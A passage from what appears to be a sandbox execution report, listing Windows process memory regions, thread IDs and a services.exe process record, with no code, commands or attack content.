"private_0x00000038003b0000" filename = "" Region: id = 2811 start_va = 0x38003d0000 end_va = 0x38003effff entry_point = 0x0 region_type = private name = "private_0x00000038003d0000" filename = "" Region: id = 2812 start_va = 0x38003f0000 end_va = 0x380040ffff entry_point = 0x0 region_type = private name = "private_0x00000038003f0000" filename = "" Region: id = 2813 start_va = 0x3800410000 end_va = 0x380042ffff entry_point = 0x0 region_type = private name = "private_0x0000003800410000" filename = "" Region: id = 2814 start_va = 0x3800430000 end_va = 0x380044ffff entry_point = 0x0 region_type = private name = "private_0x0000003800430000" filename = "" Region: id = 2815 start_va = 0x3800450000 end_va = 0x380046ffff entry_point = 0x0 region_type = private name = "private_0x0000003800450000" filename = "" Region: id = 2816 start_va = 0x3800470000 end_va = 0x380048ffff entry_point = 0x0 region_type = private name = "private_0x0000003800470000" filename = "" Region: id = 2817 start_va = 0x3800490000 end_va = 0x38004affff entry_point = 0x0 region_type = private name = "private_0x0000003800490000" filename = "" Region: id = 2818 start_va = 0x38004b0000 end_va = 0x38004cffff entry_point = 0x0 region_type = private name = "private_0x00000038004b0000" filename = "" Region: id = 2819 start_va = 0x38004d0000 end_va = 0x38004effff entry_point = 0x0 region_type = private name = "private_0x00000038004d0000" filename = "" Region: id = 2820 start_va = 0x38004f0000 end_va = 0x380050ffff entry_point = 0x0 region_type = private name = "private_0x00000038004f0000" filename = "" Region: id = 2821 start_va = 0x3800510000 end_va = 0x380052ffff entry_point = 0x0 region_type = private name = "private_0x0000003800510000" filename = "" Region: id = 2822 start_va = 0x3800530000 end_va = 0x380054ffff entry_point = 0x0 region_type = private name = "private_0x0000003800530000" filename = "" Region: id = 2823 start_va = 0x3800550000 end_va = 0x380056ffff entry_point = 0x0 region_type = private name = "private_0x0000003800550000" filename = "" Region: id = 2824 start_va = 0x3800570000 end_va = 0x380058ffff entry_point = 0x0 region_type = private name = "private_0x0000003800570000" filename = "" Region: id = 2825 start_va = 0x3800590000 end_va = 0x38005affff entry_point = 0x0 region_type = private name = "private_0x0000003800590000" filename = "" Region: id = 2826 start_va = 0x38005b0000 end_va = 0x38005cffff entry_point = 0x0 region_type = private name = "private_0x00000038005b0000" filename = "" Region: id = 2827 start_va = 0x38005d0000 end_va = 0x38005effff entry_point = 0x0 region_type = private name = "private_0x00000038005d0000" filename = "" Region: id = 2828 start_va = 0x38005f0000 end_va = 0x380060ffff entry_point = 0x0 region_type = private name = "private_0x00000038005f0000" filename = "" Region: id = 2829 start_va = 0x3800610000 end_va = 0x380062ffff entry_point = 0x0 region_type = private name = "private_0x0000003800610000" filename = "" Region: id = 2830 start_va = 0x3800630000 end_va = 0x380064ffff entry_point = 0x0 region_type = private name = "private_0x0000003800630000" filename = "" Region: id = 2831 start_va = 0x3800650000 end_va = 0x380066ffff entry_point = 0x0 region_type = private name = "private_0x0000003800650000" filename = "" Region: id = 2832 start_va = 0x3800670000 end_va = 0x380068ffff entry_point = 0x0 region_type = private name = "private_0x0000003800670000" filename = "" Region: id = 2833 start_va = 0x3800690000 end_va = 0x38006affff entry_point = 0x0 region_type = private name = "private_0x0000003800690000" filename = "" Region: id = 2834 start_va = 0x38006b0000 end_va = 0x38006cffff entry_point = 0x0 region_type = private name = "private_0x00000038006b0000" filename = "" Region: id = 2835 start_va = 0x38006d0000 end_va = 0x38006effff entry_point = 0x0 region_type = private name = "private_0x00000038006d0000" filename = "" Region: id = 2836 start_va = 0x38006f0000 end_va = 0x380070ffff entry_point = 0x0 region_type = private name = "private_0x00000038006f0000" filename = "" Region: id = 2837 start_va = 0x3800710000 end_va = 0x380072ffff entry_point = 0x0 region_type = private name = "private_0x0000003800710000" filename = "" Region: id = 2838 start_va = 0x3800730000 end_va = 0x380074ffff entry_point = 0x0 region_type = private name = "private_0x0000003800730000" filename = "" Region: id = 2839 start_va = 0x3800750000 end_va = 0x380076ffff entry_point = 0x0 region_type = private name = "private_0x0000003800750000" filename = "" Region: id = 2840 start_va = 0x3800770000 end_va = 0x380078ffff entry_point = 0x0 region_type = private name = "private_0x0000003800770000" filename = "" Region: id = 2841 start_va = 0x3800790000 end_va = 0x38007affff entry_point = 0x0 region_type = private name = "private_0x0000003800790000" filename = "" Region: id = 2842 start_va = 0x38007b0000 end_va = 0x38007cffff entry_point = 0x0 region_type = private name = "private_0x00000038007b0000" filename = "" Region: id = 2843 start_va = 0x38007d0000 end_va = 0x38007effff entry_point = 0x0 region_type = private name = "private_0x00000038007d0000" filename = "" Region: id = 2844 start_va = 0x38007f0000 end_va = 0x380080ffff entry_point = 0x0 region_type = private name = "private_0x00000038007f0000" filename = "" Region: id = 2845 start_va = 0x3800810000 end_va = 0x380082ffff entry_point = 0x0 region_type = private name = "private_0x0000003800810000" filename = "" Region: id = 2846 start_va = 0x3800830000 end_va = 0x380084ffff entry_point = 0x0 region_type = private name = "private_0x0000003800830000" filename = "" Region: id = 2847 start_va = 0x3800850000 end_va = 0x380086ffff entry_point = 0x0 region_type = private name = "private_0x0000003800850000" filename = "" Region: id = 2848 start_va = 0x3800870000 end_va = 0x380088ffff entry_point = 0x0 region_type = private name = "private_0x0000003800870000" filename = "" Region: id = 2849 start_va = 0x3800890000 end_va = 0x38008affff entry_point = 0x0 region_type = private name = "private_0x0000003800890000" filename = "" Region: id = 2850 start_va = 0x38008b0000 end_va = 0x38008cffff entry_point = 0x0 region_type = private name = "private_0x00000038008b0000" filename = "" Region: id = 2851 start_va = 0x38008d0000 end_va = 0x38008effff entry_point = 0x0 region_type = private name = "private_0x00000038008d0000" filename = "" Region: id = 2852 start_va = 0x38008f0000 end_va = 0x380090ffff entry_point = 0x0 region_type = private name = "private_0x00000038008f0000" filename = "" Region: id = 2853 start_va = 0x3800910000 end_va = 0x380092ffff entry_point = 0x0 region_type = private name = "private_0x0000003800910000" filename = "" Region: id = 2854 start_va = 0x3800930000 end_va = 0x380094ffff entry_point = 0x0 region_type = private name = "private_0x0000003800930000" filename = "" Region: id = 2855 start_va = 0x3800950000 end_va = 0x380096ffff entry_point = 0x0 region_type = private name = "private_0x0000003800950000" filename = "" Region: id = 2856 start_va = 0x3800970000 end_va = 0x380098ffff entry_point = 0x0 region_type = private name = "private_0x0000003800970000" filename = "" Region: id = 2857 start_va = 0x3800990000 end_va = 0x38009affff entry_point = 0x0 region_type = private name = "private_0x0000003800990000" filename = "" Region: id = 2858 start_va = 0x38009b0000 end_va = 0x38009cffff entry_point = 0x0 region_type = private name = "private_0x00000038009b0000" filename = "" Region: id = 2859 start_va = 0x38009d0000 end_va = 0x38009effff entry_point = 0x0 region_type = private name = "private_0x00000038009d0000" filename = "" Region: id = 2860 start_va = 0x38009f0000 end_va = 0x3800a0ffff entry_point = 0x0 region_type = private name = "private_0x00000038009f0000" filename = "" Region: id = 2861 start_va = 0x3800a10000 end_va = 0x3800a2ffff entry_point = 0x0 region_type = private name = "private_0x0000003800a10000" filename = "" Region: id = 2862 start_va = 0x3800a30000 end_va = 0x3800a4ffff entry_point = 0x0 region_type = private name = "private_0x0000003800a30000" filename = "" Region: id = 2863 start_va = 0x3800a50000 end_va = 0x3800a6ffff entry_point = 0x0 region_type = private name = "private_0x0000003800a50000" filename = "" Region: id = 2864 start_va = 0x3800a70000 end_va = 0x3800a8ffff entry_point = 0x0 region_type = private name = "private_0x0000003800a70000" filename = "" Region: id = 2865 start_va = 0x3800a90000 end_va = 0x3800aaffff entry_point = 0x0 region_type = private name = "private_0x0000003800a90000" filename = "" Region: id = 2866 start_va = 0x3800ab0000 end_va = 0x3800acffff entry_point = 0x0 region_type = private name = "private_0x0000003800ab0000" filename = "" Region: id = 2867 start_va = 0x3800ad0000 end_va = 0x3800aeffff entry_point = 0x0 region_type = private name = "private_0x0000003800ad0000" filename = "" Region: id = 2868 start_va = 0x3800af0000 end_va = 0x3800b0ffff entry_point = 0x0 region_type = private name = "private_0x0000003800af0000" filename = "" Region: id = 2869 start_va = 0x3800b10000 end_va = 0x3800b2ffff entry_point = 0x0 region_type = private name = "private_0x0000003800b10000" filename = "" Region: id = 2870 start_va = 0x3800b30000 end_va = 0x3800b4ffff entry_point = 0x0 region_type = private name = "private_0x0000003800b30000" filename = "" Region: id = 2871 start_va = 0x3800b50000 end_va = 0x3800b6ffff entry_point = 0x0 region_type = private name = "private_0x0000003800b50000" filename = "" Region: id = 2872 start_va = 0x3800b70000 end_va = 0x3800b8ffff entry_point = 0x0 region_type = private name = "private_0x0000003800b70000" filename = "" Region: id = 2873 start_va = 0x3800b90000 end_va = 0x3800baffff entry_point = 0x0 region_type = private name = "private_0x0000003800b90000" filename = "" Region: id = 2874 start_va = 0x3800bb0000 end_va = 0x3800bcffff entry_point = 0x0 region_type = private name = "private_0x0000003800bb0000" filename = "" Region: id = 2875 start_va = 0x3800bd0000 end_va = 0x3800beffff entry_point = 0x0 region_type = private name = "private_0x0000003800bd0000" filename = "" Region: id = 2876 start_va = 0x3800bf0000 end_va = 0x3800c0ffff entry_point = 0x0 region_type = private name = "private_0x0000003800bf0000" filename = "" Region: id = 2877 start_va = 0x3800c10000 end_va = 0x3800c2ffff entry_point = 0x0 region_type = private name = "private_0x0000003800c10000" filename = "" Region: id = 2878 start_va = 0x3800c30000 end_va = 0x3800c4ffff entry_point = 0x0 region_type = private name = "private_0x0000003800c30000" filename = "" Region: id = 2879 start_va = 0x3800c50000 end_va = 0x3800c6ffff entry_point = 0x0 region_type = private name = "private_0x0000003800c50000" filename = "" Region: id = 2880 start_va = 0x3800c70000 end_va = 0x3800c8ffff entry_point = 0x0 region_type = private name = "private_0x0000003800c70000" filename = "" Region: id = 2881 start_va = 0x3800c90000 end_va = 0x3800caffff entry_point = 0x0 region_type = private name = "private_0x0000003800c90000" filename = "" Region: id = 2882 start_va = 0x3800cb0000 end_va = 0x3800ccffff entry_point = 0x0 region_type = private name = "private_0x0000003800cb0000" filename = "" Region: id = 2883 start_va = 0x3800cd0000 end_va = 0x3800ceffff entry_point = 0x0 region_type = private name = "private_0x0000003800cd0000" filename = "" Region: id = 2884 start_va = 0x3800cf0000 end_va = 0x3800d0ffff entry_point = 0x0 region_type = private name = "private_0x0000003800cf0000" filename = "" Region: id = 2885 start_va = 0x3800d10000 end_va = 0x3800d2ffff entry_point = 0x0 region_type = private name = "private_0x0000003800d10000" filename = "" Region: id = 2886 start_va = 0x3800d30000 end_va = 0x3800d4ffff entry_point = 0x0 region_type = private name = "private_0x0000003800d30000" filename = "" Region: id = 2887 start_va = 0x3800d50000 end_va = 0x3800d6ffff entry_point = 0x0 region_type = private name = "private_0x0000003800d50000" filename = "" Region: id = 2888 start_va = 0x3800d70000 end_va = 0x3800d8ffff entry_point = 0x0 region_type = private name = "private_0x0000003800d70000" filename = "" Region: id = 2889 start_va = 0x3800d90000 end_va = 0x3800daffff entry_point = 0x0 region_type = private name = "private_0x0000003800d90000" filename = "" Region: id = 2890 start_va = 0x3800db0000 end_va = 0x3800dcffff entry_point = 0x0 region_type = private name = "private_0x0000003800db0000" filename = "" Region: id = 2891 start_va = 0x3800dd0000 end_va = 0x3800deffff entry_point = 0x0 region_type = private name = "private_0x0000003800dd0000" filename = "" Region: id = 2892 start_va = 0x3800df0000 end_va = 0x3800e0ffff entry_point = 0x0 region_type = private name = "private_0x0000003800df0000" filename = "" Region: id = 2893 start_va = 0x3800e10000 end_va = 0x3800e2ffff entry_point = 0x0 region_type = private name = "private_0x0000003800e10000" filename = "" Region: id = 2894 start_va = 0x3800e30000 end_va = 0x3800e4ffff entry_point = 0x0 region_type = private name = "private_0x0000003800e30000" filename = "" Region: id = 2895 start_va = 0x3800e50000 end_va = 0x3800e6ffff entry_point = 0x0 region_type = private name = "private_0x0000003800e50000" filename = "" Region: id = 2896 start_va = 0x3800e70000 end_va = 0x3800e8ffff entry_point = 0x0 region_type = private name = "private_0x0000003800e70000" filename = "" Region: id = 2897 start_va = 0x3800e90000 end_va = 0x3800eaffff entry_point = 0x0 region_type = private name = "private_0x0000003800e90000" filename = "" Region: id = 2898 start_va = 0x3800eb0000 end_va = 0x3800ecffff entry_point = 0x0 region_type = private name = "private_0x0000003800eb0000" filename = "" Region: id = 2899 start_va = 0x3800ed0000 end_va = 0x3800eeffff entry_point = 0x0 region_type = private name = "private_0x0000003800ed0000" filename = "" Region: id = 2900 start_va = 0x3800ef0000 end_va = 0x3800f0ffff entry_point = 0x0 region_type = private name = "private_0x0000003800ef0000" filename = "" Region: id = 2901 start_va = 0x3800f10000 end_va = 0x3800f2ffff entry_point = 0x0 region_type = private name = "private_0x0000003800f10000" filename = "" Region: id = 2902 start_va = 0x3800f30000 end_va = 0x3800f4ffff entry_point = 0x0 region_type = private name = "private_0x0000003800f30000" filename = "" Region: id = 2903 start_va = 0x3800f50000 end_va = 0x3800f6ffff entry_point = 0x0 region_type = private name = "private_0x0000003800f50000" filename = "" Region: id = 2904 start_va = 0x3800f70000 end_va = 0x3800f8ffff entry_point = 0x0 region_type = private name = "private_0x0000003800f70000" filename = "" Region: id = 2905 start_va = 0x3800f90000 end_va = 0x3800faffff entry_point = 0x0 region_type = private name = "private_0x0000003800f90000" filename = "" Region: id = 2906 start_va = 0x3800fb0000 end_va = 0x3800fcffff entry_point = 0x0 region_type = private name = "private_0x0000003800fb0000" filename = "" Region: id = 2907 start_va = 0x3800fd0000 end_va = 0x3800feffff entry_point = 0x0 region_type = private name = "private_0x0000003800fd0000" filename = "" Region: id = 2908 start_va = 0x3800ff0000 end_va = 0x380100ffff entry_point = 0x0 region_type = private name = "private_0x0000003800ff0000" filename = "" Region: id = 2909 start_va = 0x3801010000 end_va = 0x380102ffff entry_point = 0x0 region_type = private name = "private_0x0000003801010000" filename = "" Region: id = 2910 start_va = 0x3801030000 end_va = 0x380104ffff entry_point = 0x0 region_type = private name = "private_0x0000003801030000" filename = "" Region: id = 2911 start_va = 0x3801050000 end_va = 0x380106ffff entry_point = 0x0 region_type = private name = "private_0x0000003801050000" filename = "" Region: id = 2912 start_va = 0x3801070000 end_va = 0x380108ffff entry_point = 0x0 region_type = private name = "private_0x0000003801070000" filename = "" Region: id = 2913 start_va = 0x3801090000 end_va = 0x38010affff entry_point = 0x0 region_type = private name = "private_0x0000003801090000" filename = "" Region: id = 2914 start_va = 0x38010b0000 end_va = 0x38010cffff entry_point = 0x0 region_type = private name = "private_0x00000038010b0000" filename = "" Region: id = 2915 start_va = 0x38010d0000 end_va = 0x38010effff entry_point = 0x0 region_type = private name = "private_0x00000038010d0000" filename = "" Region: id = 2916 start_va = 0x38010f0000 end_va = 0x380110ffff entry_point = 0x0 region_type = private name = "private_0x00000038010f0000" filename = "" Region: id = 2917 start_va = 0x3801110000 end_va = 0x380112ffff entry_point = 0x0 region_type = private name = "private_0x0000003801110000" filename = "" Region: id = 2918 start_va = 0x3801130000 end_va = 0x380114ffff entry_point = 0x0 region_type = private name = "private_0x0000003801130000" filename = "" Region: id = 2919 start_va = 0x3801150000 end_va = 0x380116ffff entry_point = 0x0 region_type = private name = "private_0x0000003801150000" filename = "" Region: id = 2920 start_va = 0x3801170000 end_va = 0x380118ffff entry_point = 0x0 region_type = private name = "private_0x0000003801170000" filename = "" Region: id = 2921 start_va = 0x3801190000 end_va = 0x38011affff entry_point = 0x0 region_type = private name = "private_0x0000003801190000" filename = "" Region: id = 2922 start_va = 0x38011b0000 end_va = 0x38011cffff entry_point = 0x0 region_type = private name = "private_0x00000038011b0000" filename = "" Region: id = 2923 start_va = 0x38011d0000 end_va = 0x38011effff entry_point = 0x0 region_type = private name = "private_0x00000038011d0000" filename = "" Region: id = 2924 start_va = 0x38011f0000 end_va = 0x380120ffff entry_point = 0x0 region_type = private name = "private_0x00000038011f0000" filename = "" Region: id = 2925 start_va = 0x3801210000 end_va = 0x380122ffff entry_point = 0x0 region_type = private name = "private_0x0000003801210000" filename = "" Region: id = 2926 start_va = 0x3801230000 end_va = 0x380124ffff entry_point = 0x0 region_type = private name = "private_0x0000003801230000" filename = "" Region: id = 2927 start_va = 0x3801250000 end_va = 0x380126ffff entry_point = 0x0 region_type = private name = "private_0x0000003801250000" filename = "" Region: id = 2928 start_va = 0x3801270000 end_va = 0x380128ffff entry_point = 0x0 region_type = private name = "private_0x0000003801270000" filename = "" Region: id = 2929 start_va = 0x3801290000 end_va = 0x38012affff entry_point = 0x0 region_type = private name = "private_0x0000003801290000" filename = "" Region: id = 2930 start_va = 0x38012b0000 end_va = 0x38012cffff entry_point = 0x0 region_type = private name = "private_0x00000038012b0000" filename = "" Region: id = 2931 start_va = 0x38012d0000 end_va = 0x38012effff entry_point = 0x0 region_type = private name = "private_0x00000038012d0000" filename = "" Region: id = 2932 start_va = 0x38012f0000 end_va = 0x380130ffff entry_point = 0x0 region_type = private name = "private_0x00000038012f0000" filename = "" Region: id = 2933 start_va = 0x3801310000 end_va = 0x380132ffff entry_point = 0x0 region_type = private name = "private_0x0000003801310000" filename = "" Region: id = 2934 start_va = 0x3801330000 end_va = 0x380134ffff entry_point = 0x0 region_type = private name = "private_0x0000003801330000" filename = "" Region: id = 2935 start_va = 0x3801350000 end_va = 0x380136ffff entry_point = 0x0 region_type = private name = "private_0x0000003801350000" filename = "" Region: id = 2936 start_va = 0x3801370000 end_va = 0x380138ffff entry_point = 0x0 region_type = private name = "private_0x0000003801370000" filename = "" Region: id = 2937 start_va = 0x3801390000 end_va = 0x38013affff entry_point = 0x0 region_type = private name = "private_0x0000003801390000" filename = "" Region: id = 2938 start_va = 0x38013b0000 end_va = 0x38013cffff entry_point = 0x0 region_type = private name = "private_0x00000038013b0000" filename = "" Region: id = 2939 start_va = 0x38013d0000 end_va = 0x38013effff entry_point = 0x0 region_type = private name = "private_0x00000038013d0000" filename = "" Region: id = 2940 start_va = 0x38013f0000 end_va = 0x380140ffff entry_point = 0x0 region_type = private name = "private_0x00000038013f0000" filename = "" Region: id = 2941 start_va = 0x3801410000 end_va = 0x380142ffff entry_point = 0x0 region_type = private name = "private_0x0000003801410000" filename = "" Region: id = 2942 start_va = 0x3801430000 end_va = 0x380144ffff entry_point = 0x0 region_type = private name = "private_0x0000003801430000" filename = "" Region: id = 2943 start_va = 0x3801450000 end_va = 0x380146ffff entry_point = 0x0 region_type = private name = "private_0x0000003801450000" filename = "" Region: id = 2944 start_va = 0x3801470000 end_va = 0x380148ffff entry_point = 0x0 region_type = private name = "private_0x0000003801470000" filename = "" Region: id = 2945 start_va = 0x3801490000 end_va = 0x38014affff entry_point = 0x0 region_type = private name = "private_0x0000003801490000" filename = "" Region: id = 2946 start_va = 0x38014b0000 end_va = 0x38014cffff entry_point = 0x0 region_type = private name = "private_0x00000038014b0000" filename = "" Region: id = 2947 start_va = 0x38014d0000 end_va = 0x38014effff entry_point = 0x0 region_type = private name = "private_0x00000038014d0000" filename = "" Region: id = 2948 start_va = 0x38014f0000 end_va = 0x380150ffff entry_point = 0x0 region_type = private name = "private_0x00000038014f0000" filename = "" Region: id = 2949 start_va = 0x3801510000 end_va = 0x380152ffff entry_point = 0x0 region_type = private name = "private_0x0000003801510000" filename = "" Region: id = 2950 start_va = 0x3801530000 end_va = 0x380154ffff entry_point = 0x0 region_type = private name = "private_0x0000003801530000" filename = "" Region: id = 2951 start_va = 0x3801550000 end_va = 0x380156ffff entry_point = 0x0 region_type = private name = "private_0x0000003801550000" filename = "" Region: id = 2952 start_va = 0x3801570000 end_va = 0x380158ffff entry_point = 0x0 region_type = private name = "private_0x0000003801570000" filename = "" Region: id = 2953 start_va = 0x3801590000 end_va = 0x38015affff entry_point = 0x0 region_type = private name = "private_0x0000003801590000" filename = "" Region: id = 2954 start_va = 0x38015b0000 end_va = 0x38015cffff entry_point = 0x0 region_type = private name = "private_0x00000038015b0000" filename = "" Region: id = 2955 start_va = 0x38015d0000 end_va = 0x38015effff entry_point = 0x0 region_type = private name = "private_0x00000038015d0000" filename = "" Region: id = 2956 start_va = 0x38015f0000 end_va = 0x380160ffff entry_point = 0x0 region_type = private name = "private_0x00000038015f0000" filename = "" Region: id = 2957 start_va = 0x3801610000 end_va = 0x380162ffff entry_point = 0x0 region_type = private name = "private_0x0000003801610000" filename = "" Region: id = 2958 start_va = 0x3801630000 end_va = 0x380164ffff entry_point = 0x0 region_type = private name = "private_0x0000003801630000" filename = "" Region: id = 2959 start_va = 0x3801650000 end_va = 0x380166ffff entry_point = 0x0 region_type = private name = "private_0x0000003801650000" filename = "" Region: id = 2960 start_va = 0x3801670000 end_va = 0x380168ffff entry_point = 0x0 region_type = private name = "private_0x0000003801670000" filename = "" Region: id = 2961 start_va = 0x3801690000 end_va = 0x38016affff entry_point = 0x0 region_type = private name = "private_0x0000003801690000" filename = "" Region: id = 2962 start_va = 0x7ffc57b50000 end_va = 0x7ffc57d11fff entry_point = 0x7ffc57b50000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Thread: id = 10 os_tid = 0x13c Thread: id = 11 os_tid = 0xc44 Thread: id = 12 os_tid = 0x1c Thread: id = 13 os_tid = 0x138 Thread: id = 14 os_tid = 0x674 Thread: id = 15 os_tid = 0xef8 Thread: id = 16 os_tid = 0x18 Thread: id = 17 os_tid = 0x688 Thread: id = 18 os_tid = 0x2c Thread: id = 19 os_tid = 0xd44 Thread: id = 20 os_tid = 0xd38 Thread: id = 21 os_tid = 0xcf4 Thread: id = 22 os_tid = 0xce0 Thread: id = 23 os_tid = 0x28 Thread: id = 24 os_tid = 0xcc Thread: id = 25 os_tid = 0xc8 Thread: id = 26 os_tid = 0xf0 Thread: id = 27 os_tid = 0xa34 Thread: id = 28 os_tid = 0x128 Thread: id = 29 os_tid = 0x70c Thread: id = 30 os_tid = 0x80 Thread: id = 31 os_tid = 0xac8 Thread: id = 32 os_tid = 0x30 Thread: id = 33 os_tid = 0xe8 Thread: id = 34 os_tid = 0x158 Thread: id = 35 os_tid = 0x924 Thread: id = 36 os_tid = 0xa70 Thread: id = 37 os_tid = 0xb80 Thread: id = 38 os_tid = 0x60c Thread: id = 39 os_tid = 0x790 Thread: id = 40 os_tid = 0x4b8 Thread: id = 41 os_tid = 0x0 Thread: id = 42 os_tid = 0x4f4 Thread: id = 43 os_tid = 0xad0 Thread: id = 44 os_tid = 0xac4 Thread: id = 45 os_tid = 0x9e0 Thread: id = 46 os_tid = 0x9d4 Thread: id = 47 os_tid = 0x97c Thread: id = 48 os_tid = 0x970 Thread: id = 49 os_tid = 0x10 Thread: id = 50 os_tid = 0xc4 Thread: id = 51 os_tid = 0x7b8 Thread: id = 52 os_tid = 0x38 Thread: id = 53 os_tid = 0x648 Thread: id = 54 os_tid = 0x6c Thread: id = 55 os_tid = 0x7f0 Thread: id = 56 os_tid = 0x7e8 Thread: id = 57 os_tid = 0x6a4 Thread: id = 58 os_tid = 0x6a0 Thread: id = 59 os_tid = 0x66c Thread: id = 60 os_tid = 0x650 Thread: id = 61 os_tid = 0x5dc Thread: id = 62 os_tid = 0x5d4 Thread: id = 63 os_tid = 0x598 Thread: id = 64 os_tid = 0x48 Thread: id = 65 os_tid = 0x174 Thread: id = 66 os_tid = 0x178 Thread: id = 67 os_tid = 0x4a4 Thread: id = 68 os_tid = 0x460 Thread: id = 69 os_tid = 0x130 Thread: id = 70 os_tid = 0x8c Thread: id = 71 os_tid = 0x74 Thread: id = 72 os_tid = 0xd0 Thread: id = 73 os_tid = 0x350 Thread: id = 74 os_tid = 0x88 Thread: id = 75 os_tid = 0x144 Thread: id = 76 os_tid = 0x2c4 Thread: id = 77 os_tid = 0x70 Thread: id = 78 os_tid = 0x84 Thread: id = 79 os_tid = 0x3c Thread: id = 80 os_tid = 0x148 Thread: id = 81 os_tid = 0x134 Thread: id = 82 os_tid = 0xb0 Thread: id = 83 os_tid = 0x44 Thread: id = 84 os_tid = 0x14 Thread: id = 85 os_tid = 0x1b0 Thread: id = 86 os_tid = 0x104 Thread: id = 87 os_tid = 0x78 Thread: id = 88 os_tid = 0x20 Thread: id = 89 os_tid = 0xa8 Thread: id = 90 os_tid = 0x17c Thread: id = 91 os_tid = 0x170 Thread: id = 92 os_tid = 0x16c Thread: id = 93 os_tid = 0x64 Thread: id = 94 os_tid = 0x164 Thread: id = 95 os_tid = 0xe4 Thread: id = 96 os_tid = 0x140 Thread: id = 97 os_tid = 0x7c Thread: id = 98 os_tid = 0x34 Thread: id = 99 os_tid = 0xf0 Thread: id = 100 os_tid = 0xa4 Thread: id = 101 os_tid = 0x128 Thread: id = 102 os_tid = 0xc0 Thread: id = 103 os_tid = 0xbc Thread: id = 104 os_tid = 0xb4 Thread: id = 105 os_tid = 0x60 Thread: id = 106 os_tid = 0x110 Thread: id = 107 os_tid = 0xb8 Thread: id = 108 os_tid = 0xec Thread: id = 109 os_tid = 0x8 Thread: id = 439 os_tid = 0xc78 Thread: id = 440 os_tid = 0xc50 Thread: id = 442 os_tid = 0x15c Thread: id = 450 os_tid = 0xccc Thread: id = 451 os_tid = 0x5c Process: id = "4" image_name = "services.exe" filename = "c:\\windows\\system32\\services.exe" page_root = "0x48be9000" os_pid = "0x1e4" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "created_daemon" parent_id = "2" os_parent_pid = "0xe88" cmd_line = "C:\\Windows\\system32\\services.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Region: id = 409 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 410 start_va = 0x81b3270000 end_va = 0x81b327ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000081b3270000" filename = "" Region: id = 411 start_va = 0x81b3280000 end_va = 0x81b3284fff entry_point = 0x81b3280000 region_type = mapped_file name = "services.exe.mui" filename = "\\Windows\\System32\\en-US\\services.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\services.exe.mui") Region: id = 412 start_va = 0x81b3290000 end_va = 0x81b32a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000081b3290000" filename = "" Region: id = 413 start_va = 0x81b32b0000 end_va = 0x81b332ffff entry_point = 0x0 region_type = private name = "private_0x00000081b32b0000" filename = "" Region: id = 414 start_va = 0x81b3330000 end_va = 0x81b3333fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000081b3330000" filename = "" Region: id = 415 start_va = 0x81b3340000 end_va = 0x81b3340fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000081b3340000" filename = "" Region: id = 416 start_va = 0x81b3350000 end_va = 0x81b340dfff entry_point = 0x81b3350000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 417 start_va = 0x81b3490000 end_va = 0x81b350ffff entry_point = 0x0 region_type = private name = "private_0x00000081b3490000" filename = "" Region: id = 418 start_va = 0x81b3510000 end_va = 0x81b3510fff entry_point = 0x0 region_type = private name = "private_0x00000081b3510000" filename = "" Region: id = 419 start_va = 0x81b3530000 end_va = 0x81b3536fff entry_point = 0x0 region_type = private name = "private_0x00000081b3530000" filename = "" Region: id = 420 start_va = 0x81b3540000 end_va = 0x81b35bffff entry_point = 0x0 region_type = private name = "private_0x00000081b3540000" filename = "" Region: id = 421 start_va = 0x81b35f0000 end_va = 0x81b35f6fff entry_point = 0x0 region_type = private name = "private_0x00000081b35f0000" filename = "" Region: id = 422 start_va = 0x81b3600000 end_va = 0x81b36fffff entry_point = 0x0 region_type = private name = "private_0x00000081b3600000" filename = "" Region: id = 423 start_va = 0x81b3700000 end_va = 0x81b37fffff entry_point = 0x0 region_type = private name = "private_0x00000081b3700000" filename = "" Region: id = 424 start_va = 0x81b3800000 end_va = 0x81b387ffff entry_point = 0x0 region_type = private name = "private_0x00000081b3800000" filename = "" Region: id = 425 start_va = 0x81b3880000 end_va = 0x81b38fffff entry_point = 0x0 region_type = private name = "private_0x00000081b3880000" filename = "" Region: id = 426 start_va = 0x81b3a80000 end_va = 0x81b3afffff entry_point = 0x0 region_type = private name = "private_0x00000081b3a80000" filename = "" Region: id = 427 start_va = 0x81b3c00000 end_va = 0x81b3cfffff entry_point = 0x0 region_type = private name = "private_0x00000081b3c00000" filename = "" Region: id = 428 start_va = 0x7df5ff330000 end_va = 0x7ff5ff32ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff330000" filename = "" Region: id = 429 start_va = 0x7ff77b416000 end_va = 0x7ff77b417fff entry_point = 0x0 region_type = private name = "private_0x00007ff77b416000" filename = "" Region: id = 430 start_va = 0x7ff77b41e000 end_va = 0x7ff77b41ffff entry_point = 0x0 region_type = private name = "private_0x00007ff77b41e000" filename = "" Region: id = 431 start_va = 0x7ff77b420000 end_va = 0x7ff77b51ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff77b420000" filename = "" Region: id = 432 start_va = 0x7ff77b520000 end_va = 0x7ff77b542fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff77b520000" filename = "" Region: id = 433 start_va = 0x7ff77b544000 end_va = 0x7ff77b545fff entry_point = 0x0 region_type = private name = "private_0x00007ff77b544000" filename = "" Region: id = 434 start_va = 0x7ff77b546000 end_va = 0x7ff77b547fff entry_point = 0x0 region_type = private name = "private_0x00007ff77b546000" filename = "" Region: id = 435 start_va = 0x7ff77b548000 end_va = 0x7ff77b548fff entry_point = 0x0 region_type = private name = "private_0x00007ff77b548000" filename = "" Region: id = 436 start_va = 0x7ff77b54a000 end_va = 0x7ff77b54bfff entry_point = 0x0 region_type = private name = "private_0x00007ff77b54a000" filename = "" Region: id = 437 start_va = 